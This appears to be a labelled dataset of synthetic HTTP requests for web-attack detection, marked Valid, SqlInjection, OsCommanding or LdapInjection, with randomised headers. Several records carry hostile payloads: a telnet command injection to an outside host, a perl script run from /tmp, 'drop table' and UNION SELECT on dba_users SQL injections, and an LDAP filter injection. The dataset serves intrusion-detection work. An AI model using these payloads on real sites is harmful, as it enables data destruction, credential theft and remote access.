X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29492
Start - Id: 43360
class: OsCommanding
GET /hpw_2QXuN/wO/h2heh0it9seoxasudIuo/jR@3cL7Ru2wBw.js?ot5DtIod=qAee+lredivtme&avSxms1ii=mq+df&rCkVIZYjEztG=lonuc&2ldaI=64909140&oTemt5hfacb=435347535&oseae=rgba%2B&UOtMg0IgCall_R=i3iera&itebwNarag=%5C%22++++%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++++www.laieleisinat.com+++++76%5C%3B&dibhtHyzmrsn=11791&7loo=93272 HTTP/1.1
Host: 21.171.144.42
Connection: 06iot
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 156.10.128.233
Cookie: 5aynsmdlr=sdemevot;fsAe=mnlTe-tdl
Cookie2: $Version="744"
Date: Tue, 20 Oct 09 12:54:40 GMT
ETag: "sGTPto@sg46rGoo"
Expect: seetl=mqbf
From: vpsly@coiheDy.uk
If-Modified-Since: Thu, 30 Apr 09 12:48:43 UTC
If-Unmodified-Since: Fri, 25 May 07 23:20:49 GMT
If-Match: "9AhCI5mLz0PxiszuM"
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: *
Max-Forwards: 468
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: s706we eeedsr=aacN
Range: 9-
Referer: /Vjle/oSytie.sh
TE: trailers
Trailer: If-Range
User-Agent: f18AIjj http://www.hik6.biz
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 331x628
Via: 9.6 www.rTan.shtml:29
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 363 www.igd5n.css "nqcasc4" "Sun, 08 Jun 08 05:03:15 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3255845056436088473
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43360
Start - Id: 27471
class: Valid
GET /sZtNUocs6DVVSds/u3DYyiiJ/cPDdLZkTo8j@m.jsp?OerhSRets=uselectsi+s%3Fa&c6=3&@HrUBHMMXvks=2nnhb5huhbmn HTTP/1.0
Host: www.yEsjQQi.gov:6038
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.0, x-mac-greek;q=0.9, x-mac-japanese;q=0.4, x-mac-japanese
Accept-Encoding: 
Accept-Language: Cr-2qmo2ar, rzheiAn-JE5ivaTi
Cache-Control: no-cache
Client-ip: 94.131.143.146
Cookie: tiinRzan=iJH;7hetnoc60EaoDa=0;s7=140355;eelea=pE14R-hd;ei9nds=exhsexecssirhttpnrt
Cookie2: $Version="5"
Date: Thu, 15 Jan 09 03:30:58 GMT
ETag: W/"Bdp2xEssGZ3t@BbKey.7"
Expect: Dr6eo3i=fiiom3eN;iawnsS=qo8an
From: lnoa@mkfNdbdI2t.de
If-Modified-Since: Sun, 09 Oct 05 24:08:37 GMT
If-Unmodified-Since: Thu, 02 Oct 08 13:50:10 GMT
If-Match: "fMz6hCnC1B7Zn3HUS6"
If-None-Match: *
If-Range: Tue, 18 May 04 19:24:39 CET
Max-Forwards: 795
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: butNst znws=oeietn
Authorization: NTLM cm1hYWM4bjRUaHN3dU9sb25UaXJlSWV0NWltM295ZWRhc2VvdHR1YWptdGg=
Range: -89,09289-622,74434-579715
Referer: /3euwsv/jgniu/snInf3/k5nc/Wqhe.php4
TE: chunked;q=0.9,deflate;q=0.7
Trailer: Referer
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 8.3; sd-ia; rv:5.2.7) Gecko/87515105
UA-CPU: PowerPC
UA-Disp: 857,147,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 802x162
Via: 0.3 185.55.10.10
Transfer-Encoding: dacuPy
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 993 106.196.115.219 "1guqemiCmgtnIldhah" "Fri, 19 Jan 07 07:46:43 CET"
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 1838751121363
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27471
Start - Id: 41284
class: SqlInjection
GET /eki/smpys1g/i2t3jdtwnehg4x/t@/a1ZlsaErh/lXFj/pdkeaend/eo/lahaoD6o2jtlrj.pl?1iri0i=oNftKOtYn1C&hbtetywe=rtcrhlWcohi9g&onazhgnynE=0515900&8iy4aij=ryat%7Ell%28hdxw&fdei=i&5CKxDG.F-j=eei&aplzo3=251454&tn=211&gyTyi=eRYN%40Bru&dtwn2af6Tp=SRbliQk&A25OyUb=8449&303z=ra&etrcinsroc=0271750318&hlotiL=53672185&gu=35 HTTP/1.0
Host: 177.181.235.133
Connection: unqon
Accept: */*;q=0.9
Accept-Charset: x-mac-greek, x-mac-japanese, gb2312;q=0.2, iso-8859-8, iso-8859-8;q=0.1
Accept-Encoding: 
Accept-Language: PHRy2pi-rsid
Cache-Control: max-age=4
Client-ip: 105.174.91.211
Cookie: topd=ak1UCNkkS@;iruieWa6bi=';   drop     table    actei;Weelsiilp=ur@TWSOm_XjZ;wDet=sAr18]da$b;76zexec5a=udtvt
Cookie2: $Version="29"
Date: Fri, 25 Aug 06 24:28:06 CET
ETag: "Ra_zmXAZ5C8H_OykNnm"
Expect: 100-continue
From: umel3@8tnzus.com
If-Modified-Since: Wed, 26 Oct 05 18:38:40 UTC
If-Unmodified-Since: Wed, 06 Aug 08 11:23:14 GMT
If-Match: "va2VBcEknL7fii8"
If-None-Match: *
If-Range: Tue, 31 Mar 09 15:39:22 GMT
Max-Forwards: 1549
MIME-Version: 7.7
Pragma: peasN='a'
Proxy-Authorization: 2Toi zCgjsab1=0cdocs
Authorization: NTLM ZXYyaXdlVmY0dG5uaG9yTnFnbmU2bW5uaWxzYWRFRzg=
Range: 845764-
Referer: http://jAuraElr.it/lI9r/revmp9/osrdnyc.tiff
TE: deflate,trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/4.9 (compatible; MSIE 2.7; Mac OS X; offo; ys5oRtr)
UA-Disp: 9646,8421,16
UA-OS: Windows NT
UA-Color: color32
Via: 3.4 www.owhiajc.htm, 2.7 43.62.180.35, 1.6 www.oiropor.tiff
Transfer-Encoding: compress
Upgrade: Eatt/2.6, dLoaqy/4.7, egikj/3.1, m8i2nr/4.1
Warning: 946 www.ttaflam.js:25381 "lieaaerr1" 
X-Forwarded-For: 90.26.199.114
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41284
Start - Id: 33825
class: Valid
PUT /rdyotN0JSB3tHUZsnN/ei/dnGEAt/dN0jreplace1-Al@iM/txHpmHzCb3/gSH_1g4Hs/2pEoahhrheoead/MNhgnmabdoeiscnng.mspx? HTTP/1.1
Content-Length: 39
Content-Language: ti8,tor
Content-Encoding: identity
Content-Location: /jtto.txt
Content-MD5: c2M0ZXV0ZXNnZWVhcmxqcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Nov 09 09:48:54 CET
Last-Modified: Sat, 22 Nov 08 04:45:28 UTC
Host: www.eanser7CaE.be
Connection: close
Accept: */*;q=0.3
Accept-Charset: koi8-r, x-mac-greek, euc-cn;q=0.2, euc-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=3741
Client-ip: 223.99.49.208
Cookie: erhta7=o4;Sar1t=Hoi3dosesor;uinvase=692532;dpslheuxufa=fuS-nUWOH;TecHesahsiSgq=xrenh3cnCgdme8l
Cookie2: $Version="01"
Date: Thu, 13 Dec 07 18:48:34 GMT
ETag: "JnBiDwpYD6NoaHoF6p"
Expect: aomrhag3
From: dmRxngT@spiuhlni.ch
If-Modified-Since: Sat, 27 Aug 05 20:29:04 UTC
If-Unmodified-Since: Sun, 17 Dec 06 14:13:11 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Jan 10 08:55:59 CET
Max-Forwards: 5
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ejhe lie9d=RBzy
Authorization: Digest cnonce="9ssdew"
Range: 54-,81-
Referer: http://www.Xlwt.org/Et5eeEt.sh
TE: trailers,trailers
Trailer: Upgrade
User-Agent: iT7Lmm (grl6k8_R; 0aHG@T9vT3; e5V@OHH)
UA-CPU: Sparc
UA-Disp: 2081,476,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4860x424
Via: 9.6 177.188.135.79:40, 9.5 www.pO4gl.png, FTP/4.3 www.esa0.jpg
Transfer-Encoding: gzip
Upgrade: ncln/7.1
Warning: 121 233.219.120.218:98368 "zei1mea" 
X-Forwarded-For: 54.10.214.243
X-Serial-Number: 0148063102
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Pz7U0@EY6KSo=gbgsounduniony:83hk/8o

End - Id: 33825
Start - Id: 3887
class: Valid
PUT /srpc2i50tow/etN4IsX6B/IU/aai5igllR4e42o/t@@uSPqWefaaPVyL/nhshts/oeeedl9LseSieipNnn9g.js? HTTP/1.1
Content-Length: 182
Content-Language: reu,4ataenrs
Content-Encoding: deflate
Content-Location: http://www.hrsat4n.biz/Dttm/usiseb7d.jsp
Content-MD5: YWVhbnJmYWVob2V0eGVhbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 20:50:31 GMT
Last-Modified: Wed, 29 Dec 04 13:40:49 UTC
Host: 188.11.212.162
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-8;q=0.4, iso-10646-ucs-2;q=0.5, macintosh, iso-8859-6;q=0.5
Accept-Encoding: *
Accept-Language: a-eyaA;q=0.0, lnru-4BEcoyt, neenw-7ai, nrto-e;q=0.8
Cache-Control: max-age=2
Client-ip: 106.80.24.214
Cookie: Z8mthncTVSZ=wRathsLDagaeelzhQ;TQmbot=2566641776;rmeuir=787
Cookie2: $Version="32"
Date: Sun, 13 Aug 06 22:05:40 CET
ETag: "YHx9wKYTrm8.fKBjo"
Expect: irpempa
From: sEaatM@keea.biz
If-Modified-Since: Thu, 08 Mar 07 16:41:41 UTC
If-Unmodified-Since: Sun, 09 Sep 07 17:13:35 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Oct 06 08:56:46 UTC
Max-Forwards: 62
MIME-Version: 1.5
Pragma: nbq=iioost
Proxy-Authorization: NTLM b2xpaG9ycjBwbnl5ZW9mdHJoamt0b2FicGhheHFsZHkz
Authorization: Basic d2lpMDpubE5pb3M0
Range: 1170-,2356-,16538-
Referer: /2kEconi/taoi/tieGt.jpg
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/7.3 (Windows; U; Win98 2.0; fT-lk; rv:0.6.0) Gecko/91468423
UA-CPU: Sparc
UA-Disp: 837,1241,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5649x2813
Via: FTP/1.2 90.102.85.106, HTTP/5.5 www.mtled9d.shtml, Oaaseo/1.7 www.pntvino.png:64651
Transfer-Encoding: deflate
Upgrade: rAn/3.9
Warning: 279 www.eTTt9.html:61892 "e6edtaEHsOeiysxShtT" 
X-Forwarded-For: 18.27.104.194
X-Serial-Number: 537380175884943310
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gV9MgnrzH=etatttoar8arnh&qHtposition.@input=atO&nedhh1udemer=m(p@cac4treplace+e3esns&bncldae=ex-&esbwh='d6;khc&n4e7tMlK=489&Zc4y=srjae&KP7fromJconnect3= &d3yAncohaZaasYr=rL

End - Id: 3887
Start - Id: 39105
class: LdapInjection
POST /dLqRs2p/mUF6tMITfZPUBIq5/sPu/2UxmKyb5fdk/ruat/x6eyw3esoeeza7hi8/rlitnfyt/l-moJCc@L/chs9I1p5ssci.jpg? HTTP/1.0
Content-Length: 58
Content-Language: qnih,uan
Content-Encoding: identity
Content-Location: /tnhoaa/oloEoi/t2twln/3rsro.sh
Content-MD5: NXNuRXJzd2FxOGFFczhveQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 10 Mar 07 06:32:08 UTC
Host: 92.93.97.53
Connection: keep-alive
Accept: application/*, text/*, video/quicktime
Accept-Charset: euc-cn;q=0.0, x-mac-arabic, iso-2022-kr;q=0.0, iso-10646-ucs-2;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-transform
Cookie: rsoSda=iia)(  |  (w5n=*)
Date: Fri, 16 Jun 06 18:13:43 UTC
ETag: W/"T5j9hwxjuSBfgxb5d1U"
Expect: n8sci=pwfh
If-Modified-Since: Fri, 11 Dec 09 03:54:19 UTC
If-Unmodified-Since: Sat, 24 Dec 05 20:44:01 CET
If-Match: "ycWNki3kq9hSorU3"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.0
Pragma: no-cache
Authorization: Digest realm
Range: 67-48,09491-
Referer: /dgonnY/apeg/tgoj/ak4c.cfm
TE: trailers,trailers,gzip
Trailer: Pragma
User-Agent: oerCf2iesstgo
UA-CPU: StrongARM
UA-Disp: 560,8343,16
UA-Color: color32
UA-Pixels: 0653x3308
Via: 8.0 www.faTaaI.js:9, 3.4 242.238.40.135, ilHd/2.7 133.227.163.198
Transfer-Encoding: identity
Upgrade: rz2/0.2, imn/2.2, v538eq/0.4
Warning: 318 www.g7bg.png "aa37meuh" 

fTscriptd9ZXT=9214972644&le6ncafcthe=5e?&oqoc=8051077982

End - Id: 39105
Start - Id: 41900
class: SqlInjection
GET /eMCL-86LxeC/or4_y30_44.xJae.tiff?6om4rie=OR+++++%27eseselK6%27+++BETWEEN++%27R%27+++AND+%27T%27 HTTP/1.1
Host: 159.251.102.43:80
Connection: close
Accept: image/png
Accept-Charset: windows-1257;q=0.7, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 199.227.44.84
Cookie: 0lpizparenst=PlW;seumdh7n6YETyxt=dsel;unlpuTddeyYp=592656429
Cookie2: $Version="074"
Date: Sun, 18 Dec 05 13:31:11 CET
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: whodpi@rrheriuA.net
If-Modified-Since: Sun, 25 Sep 05 15:26:55 UTC
If-Unmodified-Since: Wed, 04 Jul 07 19:15:59 GMT
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: "ewigRc4DfZXDz1krSjNV"
If-Range: *
Max-Forwards: 444
MIME-Version: 4.7
Pragma: Tso='qa2aisae'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Digest username="nruk"
Range: 814292-
Referer: /ove8prge/n9fryefp/whrtiswu.pl
TE: trailers
Trailer: Via
User-Agent: ee5uoiinyf (dBkjHA; sFgEOkCfG; tjCx55f)
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/4.6 172.53.55.129, Oft/8.5 www.ooghtst9.tiff, FTP/5.5 96.241.196.77
Transfer-Encoding: compress
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 643 206.216.27.149 "suiowsouaeabcnttoryg" "Thu, 27 Oct 05 01:48:14 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41900
Start - Id: 43044
class: OsCommanding
PUT /eyajei/g1/zrocSvp6Eeinme/te/in1nlsiaeptnii4i7h.aspx? HTTP/1.1
Content-Length: 137
Content-Language: nas,rWw
Content-Encoding: compress
Content-Location: http://qeti3.it/hst9O.gz
Content-MD5: cW4xdFRlb2FoZXNzYXpyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Oct 09 07:35:24 CET
Last-Modified: Fri, 13 Aug 04 05:26:04 CET
Host: 209.84.36.212:80
Connection: ewpAt
Accept: audio/*;q=0.6, text/html;q=0.6, video/mpeg;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 121.29.110.84
Cookie: 5ZZ9N8=wlDega1dodh1r;e3uwnmlanaglj=oedt1;atshtE=ei3arsteirttQit;eudnebtps3gx=nuoo
Cookie2: $Version="0"
Date: Sun, 02 Nov 08 08:43:38 UTC
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: mreeste@aqoethavtE.gov
If-Modified-Since: Sun, 16 Aug 09 21:58:26 CET
If-Unmodified-Since: Mon, 24 Nov 08 06:12:27 CET
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: "9ZeuzdNhr24f44h"
If-Range: "QpOElv88Hp3DgAg9E"
Max-Forwards: 8759
Pragma: 17BRynI=sEn8ex
Proxy-Authorization: titoh aivw=aonsbe
Authorization: Digest algorithm=p6ieY9
Range: -884,462922-,-41322
Referer: http://ydhzi8H.gov/efusciZ9/f7caytnn.wav
TE: trailers,trailers,deflate;q=0.0
Trailer: From
User-Agent: kn7MIaaY
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: HTTP/4.4 68.103.204.17, oER/4.5 227.47.97.62
Transfer-Encoding: gzip
Upgrade: 6eo/8.6, xnieO/5.1, ontIn/6.5, lyi/1.7, atafbe/1.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sd=4&.@Lnoorgroup byt4mB1=hxP&Wimgemai2vn=n&enYz2nvye1=oa&bt=/perl /tmp/le.pl    -p5741&oPn4F=nu6&muo1=a nh&8GQWWaxstyled=ptiels7ta

End - Id: 43044
Start - Id: 33242
class: Valid
POST /Trae8xSscgbsiewgOt/r6/enornnqjs.php3? HTTP/1.1
Content-Length: 211
Content-Language: eToA,ttasa,w
Content-Encoding: gzip
Content-Location: /t0857/tbihuart/EEtlbU2.asmx
Content-MD5: Ym9sdGZndmFkbmRkNHFyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Nov 08 17:28:27 CET
Last-Modified: Sun, 26 Dec 04 08:30:04 UTC
Host: www.S9use.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, big5;q=0.2, gb2312;q=0.8, iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 234.29.15.136
Cookie: eamo=78309187
Cookie2: $Version="524"
Date: Mon, 04 Jul 05 23:08:29 GMT
ETag: "UdjBqJD9vcDTBd4"
Expect: 100-continue
From: erTsnsa@9ala.gov
If-Modified-Since: Thu, 20 Mar 08 12:55:57 UTC
If-Unmodified-Since: Thu, 26 Aug 04 03:51:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Feb 08 06:13:14 GMT
Max-Forwards: 132
MIME-Version: 7.1
Pragma: dyli8a='eioed'
Proxy-Authorization: Basic VHM3azp5ZW9vdG1k
Authorization: NTLM blRndHM3bG5sc3RydHM1ZWxydTdocmVpZW9PbmN0bmVlaHRhcWhmamU=
Range: 7-,628-,0904-1
Referer: http://8yoga.com/38let/DTie/ittg9ebw/vevmd84/aotnls.cgi
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: cXE7H. http://www.nsBih.de
UA-CPU: Sparc
UA-Disp: 088,074,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0112x4433
Via: 4.0 235.211.34.115
Transfer-Encoding: identity
Upgrade: nldlr/7.8, thwau/5.3, EiaE/2.5, Wpkdip/0.6
Warning: 387 www.AeHg.jpg:7663 "tkui7EzbN" "Sat, 27 Jan 07 16:30:28 GMT"
X-Forwarded-For: 241.238.1.57
X-Serial-Number: 979942
----: -----------------------------------
~~~~~: ~~~~~~~~~~

updateIgWAE45Xh6=eueoL0sidthuriibCr&dpxoofo=sKk7R&pt6=tHhxOww&eh=3eoDiinserto=gfpe)ltenl&hrsdsishtieL66d=9&etlerq9e=4&1mfNh4Fz=6075205&iectos=6@bPqajX&toseos=union&tsosagoh=oaroooifnhjsE&ittclhiaimaMhb=231

End - Id: 33242
Start - Id: 33595
class: Valid
POST /lP8EZs/et8nb9M_yEC/afnNavszuebUqb/arB@kQWlxCLTb6iVt.bin? HTTP/1.1
Content-Length: 169
Content-Language: dxsou,n31pd
Content-Encoding: compress
Content-Location: /oitjdce/oiba/vie2sh/7E9wutHn/zi4ee.asp
Content-MD5: b1M5b2Zhc2NhVXRvbmlvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Jun 06 17:08:38 CET
Last-Modified: Thu, 28 Aug 08 05:14:41 GMT
Host: www.b9dmam68ee.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 114.132.3.191
Cookie: beci=ou?;1f=oto;connectkFd=3986045;Hconnect2up04HexecKpD=dtAthqro;e4hritnt4bpz6pa=Epr
Cookie2: $Version="48"
Date: Thu, 08 Oct 09 22:31:47 CET
ETag: W/"N4UJhc1GS4VrAFF4tlJ"
Expect: 100-continue
If-Modified-Since: Tue, 04 Dec 07 07:05:07 GMT
If-Unmodified-Since: Wed, 12 Oct 05 20:39:37 UTC
If-Match: "jbH9jeNh@n60abQSIb"
If-None-Match: *
If-Range: Wed, 01 Aug 07 06:12:16 CET
Max-Forwards: 200
MIME-Version: 7.0
Pragma: no-cache
Authorization: Digest uri=/ezslta/Uruhhmte/atviwoe/HfiEn.tiff
Referer: /1rde0s/Seac/nt4eSya.asmx
TE: chunked;q=0.2
User-Agent: strystrte385Tuoqt6a
UA-OS: Win95
UA-Color: color8
Via: HTTP/0.9 www.nsti5qce.css
Transfer-Encoding: eUIh5
Upgrade: inft/8.1, NLdny/6.1, Iat6/2.9
Warning: 893 www.lhbahae.tiff "etmsh" "Tue, 15 Jun 04 22:14:16 CET"
X-Forwarded-For: 203.16.92.234
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

ohatesodLc=37&YI2Ft1=?stdinmailbev\d &nnTyna9uvA=myaa5alnyho&rion=boot.inibetweentahn&uocr5Fl=t&mchij1tni=huISl1adj&-xk9icp=x)cmd&ctMas5lX=t1hNrNo&tyarhcscaUd=naku

End - Id: 33595
Start - Id: 35170
class: SqlInjection
GET /bwd/honaa7/0S0scriptegwfCWrh/eo2rcdZnls/e1Se8pofqe/tsnOolntdyAnertrGr/bbANSC_-pGobmn/eamtrn/9F.3@j.QLwwMplkE/sc8heer.mdb?abl4diai7rdeqey=689943672&wle7s=O3htpass2o%3Erl&E69hr=lmc&siruAScesnhs3m=slneedr8Eee&reaEIhEy4ja=eEat%27%2F**%2FUNION%2F**%2FSELECT%2F**%2F26het%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2FaYenoO%2F**%2Flike%2F**%2F%27%2525&cTNweun5si=4 HTTP/1.0
Host: 8.125.135.185
Connection: reecaeo
Accept: audio/x-wav, video/quicktime;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 86.6.34.68
Cookie: bhatTchgtrryedM=ax4eqesr9Rw;Km6KoQJ=esLilyDect;eTkm72hrs=82118
Cookie2: $Version="07"
Date: Wed, 06 Apr 05 04:09:17 CET
ETag: W/"Ru@13T1myCGZ6wl86"
If-Modified-Since: Thu, 22 Jul 04 16:44:03 CET
If-Unmodified-Since: Sun, 23 Oct 05 06:11:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
Proxy-Authorization: NTLM bWM1dG80b0x0MjBzYWFzaXVmZXRzczlyM211NG5yaHR2YjNtbW5zY25sZTlsNWZv
Authorization: cwoS iinen=7oexy
Range: -619874,-90
Referer: http://Anso.cz/xaoag/ibeguy/Aunksut/lvcs/tynd.php
TE: chunked;q=0.2,trailers
User-Agent: 01oac2NNo/6.1.2.3
UA-Disp: 1579,9873,8
Via: FTP/4.5 www.eaee9eNc.png, 1.4 101.62.77.40
Transfer-Encoding: ndteU
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35170
Start - Id: 26920
class: Valid
GET /nr3zlP/rXef0XoW5sG7nWAf/tc3fDlU5o.Xy/u7nodeawMrscript1J.sh?3skhh8eliaisnOm=gpsH&nypn=985&B3e5=ohoe%5C&7amsan=tDtzGfKkN&vw15cRt-Pj=9680416 HTTP/1.1
Host: www.iecsr.st
Connection: 8aa8blne
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.0
Accept-Language: es-riiath;q=0.7, e-s;q=0.1, aAh-eoal0lOo
Cache-Control: only-if-cached
Client-ip: 166.129.125.203
Cookie: sasZsten0=eeO8RHR1;8rssg6oA9py6ri=8252726098;nset5ebHn=41409;ome=448;nciTW.xterm285=69611006
Cookie2: $Version="3"
Date: Thu, 01 Nov 07 22:37:43 GMT
ETag: W/"@NvXJ@pzSAgkI4b"
Expect: rielsotd
From: hivetoa@epAldB8o.biz
If-Modified-Since: Wed, 01 Oct 08 16:22:41 UTC
If-Unmodified-Since: Mon, 06 Apr 09 08:00:35 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Feb 09 09:20:29 CET
Max-Forwards: 323
MIME-Version: 3.8
Pragma: ncss=m
Proxy-Authorization: NTLM aGFkbHRyb0RxYVRiMHQwaWV0bjY0bXNkMGg2emV0aHR0bnJTTThI
Authorization: NTLM bjBudWlzMWFuYXVlZXVlYnBFYmpua2h0dGFHYXJ0bnVFZHptdGVS
Range: 2-,09-
Referer: http://www.eiZorz7s.com/lneiprs/UdETraq/tYn7fSE/eitaom/ecjpd.pl
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/4.9 (X11; U; Linux i386 7.4; hb-da; rv:4.3.4) Gecko/09187954
UA-CPU: Sparc
UA-Disp: 5159,4432,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 838x311
Via: FTP/8.0 www.rDaoN.html
Transfer-Encoding: gzip
Upgrade: nag0E/3.8
Warning: 392 186.134.236.106 "n5tmprahntreds1rsad" "Sat, 03 Jan 09 12:21:52 UTC"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26920
Start - Id: 20977
class: Valid
GET /oteh5anyteth/ajoT8ieSiasnxwcnncIe/SmochaTZ6p.bin?duerdOhn1h=606187&nnuebstbsuN7t=-4&connectcdhtpass_KUEN5xc=37aON1 HTTP/1.1
Host: 125.232.24.72:9579
Connection: mtumA
Accept: */*;q=0.8
Accept-Charset: windows-1257, windows-874, iso-8859-6, iso-8859-1;q=0.7, x-mac-korean
Accept-Encoding: compress;q=0.7, compress
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 118.110.105.174
Cookie: exfTcvf=h2<tere1dmha;0cg=otemda7ebeeami;mNueet=dQHL0;ckctttac= nO0body r(wg>iner;ee=325;brh2dtsnnmlnqdt=71550824
Cookie2: $Version="212"
Date: Sun, 22 Feb 04 13:06:28 CET
ETag: W/"WzYc2l.lXp4XZd5i"
Expect: enii1Rn=icktpe
From: irgi@d2o4leorue.biz
If-Modified-Since: Thu, 27 Sep 07 20:51:31 CET
If-Unmodified-Since: Fri, 10 Sep 04 23:39:34 GMT
If-Match: "NzRSlOPN1@76ub@x"
If-None-Match: *
If-Range: Mon, 29 Nov 04 20:12:46 UTC
Max-Forwards: 780
MIME-Version: 1.5
Pragma: cgr=ete7t
Proxy-Authorization: Basic ZW9sVnRhdGU6Y05jeXllbg==
Authorization: Digest realm
Range: 8-7,-0713,855020-
Referer: http://www.pceodeaH.com/aEee/mrugti.jsp
TE: trailers,chunked;q=0.3
Trailer: Authorization
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 5.1; ei-h8; rv:7.2.8) Gecko/53483834
UA-CPU: 68000
UA-Disp: 3276,4561,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2687x271
Via: 1.1 www.2obmhmE.jpg
Transfer-Encoding: deflate
Upgrade: wrn/1.7, tal/7.3, xhsnbh/3.1, taut/3.1
Warning: 001 216.250.141.79 "mrtlI" "Wed, 07 Apr 10 04:48:16 CET"
X-Forwarded-For: 36.101.205.182
X-Serial-Number: 40381242667
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20977
Start - Id: 22506
class: Valid
GET /tl9kbWq4sce8t/5tti/hns4n/XyKl_xCRWS/7ONEaelderzetruewh/i5lsmhrFm.cfm?tebawe=pbCugxPW HTTP/1.1
Host: www.enoecan.gov
Connection: close
Accept: audio/basic;q=0.2, audio/basic
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.8, gzip, compress, compress, deflate;q=0.9
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 1.43.92.227
Cookie: Bae7paeeoiF=774520
Cookie2: $Version="82"
